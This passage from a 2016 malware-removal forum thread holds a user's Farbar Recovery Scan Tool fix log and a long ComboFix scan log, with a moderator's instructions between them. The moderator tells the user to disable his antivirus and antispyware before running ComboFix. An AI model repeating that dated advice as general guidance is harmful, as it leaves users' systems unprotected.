First of all my thanks for replying so quicky! I really appreciate your help in this matter.

I just received the same DLL error again after I did the above.

The log:

Fix resultaat van Farbar Recovery Scan Tool (x64) Versie:27-01-2016

Gestart door Thomas (2016-01-31 18:54:58) Run:2

Gestart vanaf C:\Users\Thomas\Desktop

Geladen Profielen: Thomas (Beschikbare Profielen: Thomas & Farah)

Boot Modus: Normal

==============================================

fixlist inhoud:

*****************

CreateRestorePoint:

cmd: sfc /scanfile=C:\Windows\system32\rundll32.exe

cmd: sfc /scanfile=C:\Windows\SysWOW64\rundll32.exe

EmptyTemp:

CMD: bitsadmin /reset /allusers

*****************

Herstelpunt is succesfol gemaakt.

========= sfc /scanfile=C:\Windows\system32\rundll32.exe =========

Er zijn geen schendingen van de integriteit gevonden.

========= Eind van CMD: =========

========= sfc /scanfile=C:\Windows\SysWOW64\rundll32.exe =========

Er zijn geen schendingen van de integriteit gevonden.

========= Eind van CMD: =========

========= bitsadmin /reset /allusers =========

BITSADMIN version 3.0 [ 7.5.7601 ]

BITS administration utility.

BITSAdmin is deprecated and is not guaranteed to be available in future versions of Windows.

Administrative tools for the BITS service are now provided by BITS PowerShell cmdlets.

0 out of 0 jobs canceled.

========= Eind van CMD: =========

EmptyTemp: => 23.7 MB tijdelijke gegevens verwijderd.

Het systeem moest herstart worden.

==== Eind van Fixlog 18:55:35 ====

#6
Essexboy

Posted 31 January 2016 - 02:57 PM

GeekU Moderator

Retired Staff
69,964 posts

OK the files are sound, are you still getting the warnings ?

#7
Tommie

Posted 31 January 2016 - 03:55 PM

Member

Topic Starter
Member
39 posts

Still getting the same error message. What can I do next?

#8
Essexboy

Posted 31 January 2016 - 04:02 PM

GeekU Moderator

Retired Staff
69,964 posts

OK I believe all the malware is gone but, lets look deeper

Download and Install Combofix

Download ComboFix from one of the following locations:
Link 1
Link 2

VERY IMPORTANT !!! Save ComboFix.exe to your Desktop

* IMPORTANT - Disable your AntiVirus and AntiSpyware applications, usually via a right click on the System Tray icon. They may otherwise interfere with our tools. If you have difficulty properly disabling your protective programs, refer to this link here

Double click on ComboFix.exe & follow the prompts.
Accept the disclaimer and allow to update if it asks

http://img.photobuck...claimer_ENG.png

When finished, it shall produce a log for you.
Please include the C:\ComboFix.txt in your next reply.
Notes:
1. Do not mouse-click Combofix's window while it is running. That may cause it to stall.
2. Do not "re-run" Combofix. If you have a problem, reply back for further instructions.
3. If after the reboot you get errors about programmes being marked for deletion then reboot, that will cure it.

Please make sure you include the combo fix log in your next reply as well as describe how your computer is running now

#9
Tommie

Posted 31 January 2016 - 04:29 PM

Member

Topic Starter
Member
39 posts

So I started ComboFix. During the scan the DLL error came up again. After a while the error message disappeared again.

Hereby the results:

ComboFix 16-01-31.01 - Thomas 31-01-2016 23:12:58.1.4 - x64

Microsoft Windows 7 Home Premium 6.1.7601.1.1252.31.1043.18.4023.1473 [GMT 1:00]

Gestart vanuit: c:\users\Thomas\Desktop\ComboFix.exe

AV: Microsoft Security Essentials *Disabled/Updated* {B7ECF8CD-0188-6703-DBA4-AA65C6ACFB0A}

SP: Microsoft Security Essentials *Disabled/Updated* {0C8D1929-27B2-688D-E114-9117BD2BB1B7}

SP: Windows Defender *Disabled/Outdated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

(((((((((((((((((((((((((((((((((( Andere Verwijderingen )))))))))))))))))))))))))))))))))))))))))))))))))

C:\data

c:\users\Thomas\AppData\Local\TempDIR

c:\users\Thomas\AppData\Local\TempDIR\SecureW2_Enterprise_Client_359.exe

c:\windows\msdownld.tmp

(((((((((((((((((((( Bestanden Gemaakt van 2015-12-28 to 2016-01-31 ))))))))))))))))))))))))))))))

2016-01-31 22:23 . 2016-01-31 22:23 -------- d-----w- c:\users\Farah\AppData\Local\temp

2016-01-31 22:23 . 2016-01-31 22:23 -------- d-----w- c:\users\Default\AppData\Local\temp

2016-01-31 21:08 . 2016-01-31 21:08 75888 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0E75DAAF-4846-4051-952D-EC3A94910395}\offreg.980.dll

2016-01-31 19:16 . 2015-11-25 02:02 11154520 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{0E75DAAF-4846-4051-952D-EC3A94910395}\mpengine.dll

2016-01-31 19:04 . 2015-08-05 17:56 22528 ----a-w- c:\windows\system32\icaapi.dll

2016-01-31 19:04 . 2015-08-05 17:06 39936 ----a-w- c:\windows\system32\drivers\tssecsrv.sys

2016-01-31 19:03 . 2015-12-16 18:55 69120 ----a-w- c:\windows\system32\nlsbres.dll

2016-01-31 19:03 . 2015-12-16 18:53 7168 ----a-w- c:\windows\system32\kbdgeoqw.dll

2016-01-31 19:03 . 2015-12-16 18:53 7168 ----a-w- c:\windows\system32\KBDAZEL.DLL

2016-01-31 19:03 . 2015-12-16 18:53 7168 ----a-w- c:\windows\system32\KBDAZE.DLL

2016-01-31 19:03 . 2015-12-16 18:48 6656 ----a-w- c:\windows\SysWow64\kbdgeoqw.dll

2016-01-31 19:03 . 2015-12-16 18:48 6656 ----a-w- c:\windows\SysWow64\KBDAZEL.DLL

2016-01-31 19:03 . 2015-12-16 18:47 69120 ----a-w- c:\windows\SysWow64\nlsbres.dll

2016-01-31 15:47 . 2016-01-31 15:47 -------- d-----w- c:\users\Thomas\AppData\Local\GWX

2016-01-31 14:52 . 2016-01-31 18:32 -------- d-----w- C:\FRST

2016-01-30 20:58 . 2016-01-30 20:58 -------- d-----w- c:\users\Farah\AppData\Local\GWX

2016-01-30 20:52 . 2016-01-30 20:56 -------- d-----w- c:\users\Farah\AppData\Local\Google

2016-01-30 20:07 . 2015-12-19 13:28 1190000 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\{A36491D4-596B-4394-BCBA-6F002650BA40}\gapaengine.dll

2016-01-30 20:07 . 2015-11-25 02:02 11154520 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\Backup\mpengine.dll

2016-01-30 15:58 . 2016-01-31 16:19 -------- d-----w- c:\programdata\Package Cache

2016-01-30 15:40 . 2016-01-31 11:01 -------- d-----w- c:\users\Thomas\AppData\Roaming\Enigma Software Group

2016-01-30 15:39 . 2016-01-30 15:39 22704 ----a-w- c:\windows\system32\drivers\EsgScanner.sys

2016-01-30 14:24 . 2015-12-08 21:53 4608 ----a-w- c:\windows\SysWow64\ksuser.dll

2016-01-30 14:23 . 2015-12-30 19:08 5572544 ----a-w- c:\windows\system32\ntoskrnl.exe

2016-01-30 13:51 . 2015-04-29 18:22 14635008 ----a-w- c:\windows\system32\wmp.dll

2016-01-30 13:50 . 2015-06-02 00:07 254976 ----a-w- c:\windows\system32\cewmdm.dll

2016-01-30 13:50 . 2015-06-01 23:47 210432 ----a-w- c:\windows\SysWow64\cewmdm.dll

2016-01-30 13:50 . 2015-07-16 19:11 7077376 ----a-w- c:\windows\system32\mstscax.dll

2016-01-30 13:50 . 2015-07-11 13:15 429568 ----a-w- c:\windows\system32\wksprt.exe

2016-01-30 13:50 . 2015-07-16 19:12 6131200 ----a-w- c:\windows\SysWow64\mstscax.dll

2016-01-30 13:50 . 2015-07-16 19:12 856064 ----a-w- c:\windows\SysWow64\rdvidcrl.dll

2016-01-30 13:50 . 2015-07-16 19:11 1057792 ----a-w- c:\windows\system32\rdvidcrl.dll

2016-01-30 13:50 . 2015-07-16 19:12 53248 ----a-w- c:\windows\SysWow64\tsgqec.dll

2016-01-30 13:50 . 2015-07-16 19:11 62976 ----a-w- c:\windows\system32\tsgqec.dll

2016-01-30 13:50 . 2015-08-05 17:56 1110016 ----a-w- c:\windows\system32\schedsvc.dll

2016-01-30 13:50 . 2015-11-05 19:02 2048 ----a-w- c:\windows\system32\tzres.dll

2016-01-30 13:50 . 2015-11-05 19:00 2048 ----a-w- c:\windows\SysWow64\tzres.dll

2016-01-30 13:49 . 2015-07-15 18:10 1743360 ----a-w- c:\windows\system32\sysmain.dll

2016-01-30 13:49 . 2015-07-15 18:15 94656 ----a-w- c:\windows\system32\drivers\mountmgr.sys

2016-01-30 13:49 . 2015-07-15 18:10 11264 ----a-w- c:\windows\system32\msmmsp.dll

2016-01-30 13:49 . 2015-07-15 20:26 2560 ----a-w- c:\windows\system32\drivers\nl-NL\mountmgr.sys.mui

2016-01-30 13:47 . 2015-08-06 18:04 14176768 ----a-w- c:\windows\system32\shell32.dll

2016-01-30 13:47 . 2015-08-06 18:03 1866752 ----a-w- c:\windows\system32\ExplorerFrame.dll

2016-01-30 13:47 . 2015-08-06 17:44 1498624 ----a-w- c:\windows\SysWow64\ExplorerFrame.dll

2016-01-30 13:46 . 2015-05-25 18:19 113664 ----a-w- c:\windows\system32\sechost.dll

2016-01-30 13:46 . 2015-05-25 18:18 404992 ----a-w- c:\windows\system32\tracerpt.exe

2016-01-30 13:46 . 2015-05-25 18:00 364544 ----a-w- c:\windows\SysWow64\tracerpt.exe

2016-01-30 13:46 . 2015-05-25 18:18 104448 ----a-w- c:\windows\system32\logman.exe

2016-01-30 13:46 . 2015-05-25 18:01 92160 ----a-w- c:\windows\SysWow64\sechost.dll

2016-01-30 13:46 . 2015-05-25 18:00 82944 ----a-w- c:\windows\SysWow64\logman.exe

2016-01-30 13:46 . 2015-05-25 18:18 47104 ----a-w- c:\windows\system32\typeperf.exe

2016-01-30 13:46 . 2015-05-25 18:18 43008 ----a-w- c:\windows\system32\relog.exe

2016-01-30 13:46 . 2015-05-25 18:00 40448 ----a-w- c:\windows\SysWow64\typeperf.exe

2016-01-30 13:46 . 2015-05-25 18:00 37888 ----a-w- c:\windows\SysWow64\relog.exe

2016-01-30 13:46 . 2015-05-25 18:18 19456 ----a-w- c:\windows\system32\diskperf.exe

2016-01-30 13:46 . 2015-05-25 18:00 17408 ----a-w- c:\windows\SysWow64\diskperf.exe

2016-01-30 13:43 . 2015-07-09 17:58 1632256 ----a-w- c:\windows\system32\dwmcore.dll

2016-01-30 13:43 . 2015-07-09 17:42 1372160 ----a-w- c:\windows\SysWow64\dwmcore.dll

2016-01-30 13:43 . 2015-07-09 17:58 82944 ----a-w- c:\windows\system32\dwmapi.dll

2016-01-30 13:43 . 2015-07-09 17:42 67584 ----a-w- c:\windows\SysWow64\dwmapi.dll

2016-01-30 13:43 . 2015-07-15 03:19 52736 ----a-w- c:\windows\system32\basesrv.dll

2016-01-30 13:42 . 2015-11-10 18:55 1648128 ----a-w- c:\windows\system32\DWrite.dll

2016-01-30 13:42 . 2015-11-10 18:55 1180160 ----a-w- c:\windows\system32\FntCache.dll

2016-01-30 13:42 . 2015-11-10 18:39 1251328 ----a-w- c:\windows\SysWow64\DWrite.dll

2016-01-30 13:42 . 2015-11-10 18:55 1008640 ----a-w- c:\windows\system32\user32.dll

2016-01-30 13:42 . 2015-11-10 18:37 833024 ----a-w- c:\windows\SysWow64\user32.dll

2016-01-30 13:42 . 2015-07-01 20:49 260096 ----a-w- c:\windows\system32\WebClnt.dll

2016-01-30 13:42 . 2015-07-01 20:30 206848 ----a-w- c:\windows\SysWow64\WebClnt.dll

2016-01-30 13:42 . 2015-07-01 20:48 102912 ----a-w- c:\windows\system32\davclnt.dll

2016-01-30 13:42 . 2015-07-01 20:30 82432 ----a-w- c:\windows\SysWow64\davclnt.dll

2016-01-30 13:37 . 2015-10-13 16:41 497664 ----a-w- c:\windows\system32\drivers\afd.sys

2016-01-30 13:37 . 2015-10-13 16:40 118272 ----a-w- c:\windows\system32\drivers\tdx.sys

2016-01-30 13:37 . 2015-06-15 21:45 3242496 ----a-w- c:\windows\system32\msi.dll

2016-01-30 13:37 . 2015-06-15 21:43 2364416 ----a-w- c:\windows\SysWow64\msi.dll

2016-01-30 13:37 . 2015-06-15 21:44 128000 ----a-w- c:\windows\system32\msiexec.exe

2016-01-30 13:37 . 2015-06-15 21:45 504320 ----a-w- c:\windows\system32\msihnd.dll

2016-01-30 13:37 . 2015-06-15 21:43 337408 ----a-w- c:\windows\SysWow64\msihnd.dll

2016-01-30 13:37 . 2015-06-15 21:42 73216 ----a-w- c:\windows\SysWow64\msiexec.exe

2016-01-30 13:37 . 2015-06-15 21:42 25088 ----a-w- c:\windows\system32\msimsg.dll

2016-01-30 13:37 . 2015-06-15 21:37 25088 ----a-w- c:\windows\SysWow64\msimsg.dll

2016-01-30 13:36 . 2015-07-30 18:06 2565120 ----a-w- c:\windows\system32\d3d10warp.dll

2016-01-30 13:36 . 2015-07-30 17:57 1987584 ----a-w- c:\windows\SysWow64\d3d10warp.dll

2016-01-30 13:36 . 2015-10-29 17:50 342016 ----a-w- c:\windows\system32\apphelp.dll

2016-01-30 13:36 . 2015-10-29 17:49 295936 ----a-w- c:\windows\SysWow64\apphelp.dll

2016-01-30 13:36 . 2015-10-29 17:50 6656 ----a-w- c:\windows\system32\shimeng.dll

2016-01-30 13:36 . 2015-10-29 17:50 72192 ----a-w- c:\windows\system32\aelupsvc.dll

2016-01-30 13:36 . 2015-10-29 17:50 23552 ----a-w- c:\windows\system32\sdbinst.exe

2016-01-30 13:36 . 2015-10-29 17:49 20992 ----a-w- c:\windows\SysWow64\sdbinst.exe

2016-01-30 13:36 . 2015-10-29 17:50 5120 ----a-w- c:\windows\SysWow64\shimeng.dll

2016-01-30 13:35 . 2015-07-23 00:02 1390592 ----a-w- c:\windows\system32\diagtrack.dll

2016-01-30 13:35 . 2015-07-22 16:48 41984 ----a-w- c:\windows\system32\UtcResources.dll

2016-01-30 13:35 . 2015-07-23 00:02 879104 ----a-w- c:\windows\system32\tdh.dll

2016-01-30 13:35 . 2015-07-22 17:53 635392 ----a-w- c:\windows\SysWow64\tdh.dll

2016-01-30 13:31 . 2015-08-27 18:18 2004480 ----a-w- c:\windows\system32\msxml6.dll

2016-01-30 12:20 . 2015-01-29 03:19 2543104 ----a-w- c:\windows\system32\wpdshext.dll

2016-01-30 12:20 . 2015-01-29 03:02 2311168 ----a-w- c:\windows\SysWow64\wpdshext.dll

2016-01-30 12:20 . 2015-01-29 03:19 1195008 ----a-w- c:\windows\system32\drivers\UMDF\WpdMtpDr.dll

2016-01-30 12:19 . 2015-04-13 03:28 328704 ----a-w- c:\windows\system32\services.exe

2016-01-30 11:34 . 2016-01-30 11:36 -------- d-----w- c:\program files (x86)\Dropbox

2016-01-30 11:16 . 2016-01-31 21:03 -------- d-----w- c:\users\Thomas\AppData\Local\Dropbox

2016-01-30 11:16 . 2016-01-30 11:16 -------- d-----w- c:\programdata\Dropbox

((((((((((((((((((((((((((((((((((((((( Find3M Rapport ))))))))))))))))))))))))))))))))))))))))))))))))))))

2016-01-31 19:28 . 2010-08-13 19:08 143671360 ----a-w- c:\windows\system32\MRT.exe

2015-12-30 18:37 . 2016-01-30 14:23 44032 ----a-w- c:\windows\apppatch\acwow64.dll

2015-12-19 13:28 . 2011-09-09 12:04 1190000 ----a-w- c:\programdata\Microsoft\Microsoft Antimalware\Definition Updates\NISBackup\gapaengine.dll

2015-12-19 13:20 . 2015-12-19 13:20 0 ---ha-w- c:\users\Thomas\AppData\Local\BITAF52.tmp

2015-12-09 21:39 . 2015-12-09 21:39 1070232 ----a-w- c:\windows\SysWow64\MSCOMCTL.OCX

2015-12-09 03:39 . 2010-08-13 18:39 301728 ------w- c:\windows\system32\MpSigStub.exe

2015-12-08 19:07 . 2009-07-14 00:22 1393152 ----a-w- c:\windows\system32\WMALFXGFXDSP.dll

2015-11-05 19:36 . 2015-11-05 19:36 28352 ----a-w- c:\windows\SysWow64\aspnet_counters.dll

2015-11-05 19:36 . 2015-11-05 19:36 18600 ----a-w- c:\windows\SysWow64\msvcr110_clr0400.dll

2015-11-05 19:36 . 2015-11-05 19:36 18600 ----a-w- c:\windows\SysWow64\msvcr100_clr0400.dll

2015-11-05 19:36 . 2015-11-05 19:36 18600 ----a-w- c:\windows\SysWow64\msvcp110_clr0400.dll

2015-11-05 19:34 . 2015-11-05 19:34 30400 ----a-w- c:\windows\system32\aspnet_counters.dll

2015-11-05 19:34 . 2015-11-05 19:34 18592 ----a-w- c:\windows\system32\msvcr110_clr0400.dll

2015-11-05 19:34 . 2015-11-05 19:34 18592 ----a-w- c:\windows\system32\msvcr100_clr0400.dll

2015-11-05 19:34 . 2015-11-05 19:34 18592 ----a-w- c:\windows\system32\msvcp110_clr0400.dll

2014-11-19 22:35 . 2014-11-19 22:30 6000640 ----a-w- c:\program files (x86)\GUT609.tmp

((((((((((((((((((((((((((((((((((((( Reg Opstartpunten )))))))))))))))))))))))))))))))))))))))))))))))))))

*Nota* lege verwijzingen & legitieme standaard verwijzingen worden niet getoond

REGEDIT4

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt1]

@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt2]

@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt3]

@="{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt4]

@="{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt5]

@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt6]

@="{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt7]

@="{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\ DropboxExt8]

@="{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}"

[HKEY_CLASSES_ROOT\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B}]

2015-12-22 00:19 199488 ----a-w- c:\program files (x86)\Dropbox\Client\DropboxExt.28.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1EldosIconOverlay]

@="{904FB7E2-AD8B-45AF-B3A2-D309F7514790}"

[HKEY_CLASSES_ROOT\CLSID\{904FB7E2-AD8B-45AF-B3A2-D309F7514790}]

2012-04-09 14:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\EldosIconOverlay]

@="{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}"

[HKEY_CLASSES_ROOT\CLSID\{5BB532A2-BF14-4CCC-86B7-71B81EF6F8BC}]

2012-04-09 14:27 158224 ----a-w- c:\windows\SysWOW64\CbFsMntNtf3.dll

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run]

"hpqSRMon"="c:\program files (x86)\HP\Digital Imaging\bin\hpqSRMon.exe" [2008-07-22 150528]

"Magic Desktop for HP notification"="c:\programdata\Easybits Magic Desktop for HP\mdhpSUN.exe" [2015-12-19 1444880]

"Dropbox"="c:\program files (x86)\Dropbox\Client\Dropbox.exe" [2015-12-22 24952376]

[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]

"ConsentPromptBehaviorAdmin"= 0 (0x0)

"ConsentPromptBehaviorUser"= 3 (0x3)

"EnableLUA"= 0 (0x0)

"EnableUIADesktopToggle"= 0 (0x0)

"PromptOnSecureDesktop"= 0 (0x0)

[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\winlogon]

"Userinit"="c:\windows\system32\userinit.exe"

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\windows]

"LoadAppInit_DLLs"=1 (0x1)

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]

@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MsMpSvc]

@="Service"

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]

@="Driver"

R2 clr_optimization_v4.0.30319_64;Microsoft .NET Framework NGEN v4.0.30319_X64;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe;c:\windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [x]

R2 dbupdate;Dropbox-update-service (dbupdate);c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe;c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [x]

R2 ezSharedSvc;Easybits Shared Services for Windows;c:\windows\system32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]

R2 fa6789c5;VideoCnv;c:\windows\system32\rundll32.exe;c:\windows\SYSNATIVE\rundll32.exe [x]

R2 SkypeUpdate;Skype Updater;c:\program files (x86)\Skype\Updater\Updater.exe;c:\program files (x86)\Skype\Updater\Updater.exe [x]

R3 ALSysIO;ALSysIO;c:\users\Thomas\AppData\Local\Temp\ALSysIO64.sys;c:\users\Thomas\AppData\Local\Temp\ALSysIO64.sys [x]

R3 avmeject;AVM Eject;c:\windows\system32\drivers\avmeject.sys;c:\windows\SYSNATIVE\drivers\avmeject.sys [x]

R3 btwl2cap;Bluetooth L2CAP Service;c:\windows\system32\DRIVERS\btwl2cap.sys;c:\windows\SYSNATIVE\DRIVERS\btwl2cap.sys [x]

R3 Com4QLBEx;Com4QLBEx;c:\program files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe;c:\program files (x86)\Hewlett-Packard\HP Quick Launch Buttons\Com4QLBEx.exe [x]

R3 CV2K1;CommView Network Monitor;c:\windows\system32\DRIVERS\cv2k1.sys;c:\windows\SYSNATIVE\DRIVERS\cv2k1.sys [x]

R3 dbupdatem;Dropbox-update-service (dbupdatem);c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe;c:\program files (x86)\Dropbox\Update\DropboxUpdate.exe [x]

R3 EsgScanner;EsgScanner;c:\windows\system32\DRIVERS\EsgScanner.sys;c:\windows\SYSNATIVE\DRIVERS\EsgScanner.sys [x]

R3 fwlanusbn;FRITZ!WLAN N;c:\windows\system32\DRIVERS\fwlanusbn.sys;c:\windows\SYSNATIVE\DRIVERS\fwlanusbn.sys [x]

R3 HTCAND64;HTC Device Driver;c:\windows\system32\Drivers\ANDROIDUSB.sys;c:\windows\SYSNATIVE\Drivers\ANDROIDUSB.sys [x]

R3 htcnprot;HTC NDIS Protocol Driver;c:\windows\system32\DRIVERS\htcnprot.sys;c:\windows\SYSNATIVE\DRIVERS\htcnprot.sys [x]

R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe;c:\windows\SYSNATIVE\IEEtwCollector.exe [x]

R3 netw5v64;Intel® Wireless WiFi Link 5000 Series Adapter Driver for Windows Vista 64 Bit;c:\windows\system32\DRIVERS\netw5v64.sys;c:\windows\SYSNATIVE\DRIVERS\netw5v64.sys [x]

R3 NisDrv;Microsoft Network Inspection System;c:\windows\system32\DRIVERS\NisDrvWFP.sys;c:\windows\SYSNATIVE\DRIVERS\NisDrvWFP.sys [x]

R3 NisSrv;Microsoft Netwerkinspectie;c:\program files\Microsoft Security Client\NisSrv.exe;c:\program files\Microsoft Security Client\NisSrv.exe [x]

R3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys;c:\windows\SYSNATIVE\drivers\rdpvideominiport.sys [x]

R3 SrvHsfHDA;SrvHsfHDA;c:\windows\system32\DRIVERS\VSTAZL6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTAZL6.SYS [x]

R3 SrvHsfV92;SrvHsfV92;c:\windows\system32\DRIVERS\VSTDPV6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTDPV6.SYS [x]

R3 SrvHsfWinac;SrvHsfWinac;c:\windows\system32\DRIVERS\VSTCNXT6.SYS;c:\windows\SYSNATIVE\DRIVERS\VSTCNXT6.SYS [x]

R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys;c:\windows\SYSNATIVE\drivers\tsusbflt.sys [x]

R3 USBAAPL64;Apple Mobile USB Driver;c:\windows\system32\Drivers\usbaapl64.sys;c:\windows\SYSNATIVE\Drivers\usbaapl64.sys [x]

R3 WatAdminSvc;Windows Activation Technologies-service;c:\windows\system32\Wat\WatAdminSvc.exe;c:\windows\SYSNATIVE\Wat\WatAdminSvc.exe [x]

R3 yukonw7;NDIS6.2 Miniport Driver for Marvell Yukon Ethernet Controller;c:\windows\system32\DRIVERS\yk62x64.sys;c:\windows\SYSNATIVE\DRIVERS\yk62x64.sys [x]

R4 MSSQLServerADHelper100;SQL Active Directory Helper Service;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE;c:\program files\Microsoft SQL Server\100\Shared\SQLADHLP.EXE [x]

R4 RsFx0105;RsFx0105 Driver;c:\windows\system32\DRIVERS\RsFx0105.sys;c:\windows\SYSNATIVE\DRIVERS\RsFx0105.sys [x]

R4 SQLAgent$SQLEXPRESS;SQL Server Agent (SQLEXPRESS);c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE;c:\program files\Microsoft SQL Server\MSSQL10.SQLEXPRESS\MSSQL\Binn\SQLAGENT.EXE [x]

S0 sptd;sptd;c:\windows\\SystemRoot\System32\Drivers\sptd.sys;c:\windows\\SystemRoot\System32\Drivers\sptd.sys [x]

S1 cbfs3;cbfs3;c:\windows\system32\drivers\cbfs3.sys;c:\windows\SYSNATIVE\drivers\cbfs3.sys [x]

S2 AESTFilters;Andrea ST Filters Service;c:\windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe;c:\windows\SYSNATIVE\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_70dacb64382a61a7\AESTSr64.exe [x]

S2 DiagTrack;Diagnostics Tracking Service;c:\windows\System32\svchost.exe;c:\windows\SYSNATIVE\svchost.exe [x]

S2 hpsrv;HP Service;c:\windows\system32\Hpservice.exe;c:\windows\SYSNATIVE\Hpservice.exe [x]

S2 PassThru Service;Internet Pass-Through Service;c:\program files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe;c:\program files (x86)\HTC\Internet Pass-Through\PassThruSvr.exe [x]

S2 TeamViewer9;TeamViewer 9;c:\program files (x86)\TeamViewer\Version9\TeamViewer_Service.exe;c:\program files (x86)\TeamViewer\Version9\TeamViewer_Service.exe [x]

S3 enecir;ENE CIR Receiver;c:\windows\system32\DRIVERS\enecir.sys;c:\windows\SYSNATIVE\DRIVERS\enecir.sys [x]

S3 Impcd;Impcd;c:\windows\system32\DRIVERS\Impcd.sys;c:\windows\SYSNATIVE\DRIVERS\Impcd.sys [x]

S3 JMCR;JMCR;c:\windows\system32\DRIVERS\jmcr.sys;c:\windows\SYSNATIVE\DRIVERS\jmcr.sys [x]

S3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\DRIVERS\Rt64win7.sys;c:\windows\SYSNATIVE\DRIVERS\Rt64win7.sys [x]

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\windows nt\currentversion\svchost]

hpdevmgmt REG_MULTI_SZ hpqcxs08 hpqddsvc

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Svchost - NetSvcs

ezSharedSvc

[HKEY_LOCAL_MACHINE\software\wow6432node\microsoft\active setup\installed components\{10880D85-AAD9-4558-ABDC-2AB1552D831F}]

2009-08-20 12:24 451872 ----a-w- c:\program files (x86)\Common Files\LightScribe\LSRunOnce.exe

